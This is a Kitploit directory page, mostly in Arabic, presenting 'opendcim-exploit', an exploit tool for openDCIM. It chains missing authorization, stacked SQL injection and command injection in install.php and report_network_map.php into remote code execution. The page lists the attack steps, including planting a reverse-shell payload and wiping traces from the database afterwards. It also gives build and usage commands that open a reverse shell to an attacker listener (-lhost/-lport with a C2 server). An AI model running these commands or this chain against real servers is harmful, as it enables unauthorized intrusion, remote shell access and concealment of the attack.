Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
opendcim-exploit — سلسلة استغلال SQLi إلى RCE في openDCIM install.php (CWE-862 + CWE-89 + CWE-78) | Kitploit
أدوات/GitHubGitHub/chocapikk/opendcim-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubchocapikk/opendcim-exploit

opendcim-exploit

سلسلة استغلال SQLi إلى RCE في openDCIM install.php (CWE-862 + CWE-89 + CWE-78)

عرض المستودع
52منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

openDCIM - SQLi إلى RCE عبر تسميم الإعدادات

سلسلة تنفيذ أكواد عن بُعد تستهدف نموذج إعدادات LDAP في install.php الخاص بـ openDCIM. مبنية على إطار عمل VulnCheck go-exploit.

سلسلة الثغرات

#CVECWEالوصف
1CVE-2026-28515CWE-862install.php لا يجري أي فحص للصلاحيات قبل نموذج إعدادات LDAP - أي مستخدم يمكنه الوصول إليه
2CVE-2026-28516CWE-89Config::UpdateParameter() يستخدم استيفاء السلاسل النصية، استعلامات متراكبة عبر PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php يمرر قيمة إعداد dot مباشرة إلى exec()

متأثر: جميع الإصدارات (تم الاختبار على أحدث commit 4467e9c4)

كيف تعمل

  1. POST إلى install.php - حقن SQL عبر نموذج LDAP يعمل على نسخ الإعدادات احتياطيًا، ثم يستبدل dot بحمولة أوامر
  2. GET إلى report_network_map.php - يشغّل exec()، ويؤكد RCE عبر مخرجات id
  3. POST إلى install.php - يستبدل dot بحمولة reverse shell
  4. GET إلى report_network_map.php - يشغّل reverse shell
  5. POST إلى install.php - يستعيد جميع قيم الإعدادات الأصلية من جدول النسخ الاحتياطي

لا تبقى أي آثار في قاعدة البيانات بعد الاستغلال.

البناء

root@kitploit:~
go build -o opendcim-exploit .

الاستخدام

نشر Docker (بدون مصادقة)

root@kitploit:~
# فحص فقط
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# استغلال مع reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

نشر htpasswd (أي مستخدم صالح)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

الخيارات

تنزيل الأداة
الخيارالافتراضيالوصف
-rhostالمضيف المستهدف
-rport80منفذ الهدف
-sslfalseاستخدام HTTPS
-lhostمضيف المستمع (لـ reverse shell)
-lportمنفذ المستمع (لـ reverse shell)
-c2نوع C2: SimpleShellServer أو SSLShellServer
-usernameاسم مستخدم HTTP Basic Auth (احذفه لنشر SetEnv)
-passwordكلمة مرور HTTP Basic Auth (احذفها لنشر SetEnv)
-aكشف الأصول (التحقق مما إذا كان الهدف قابلاً للاستغلال)
-eوضع الاستغلال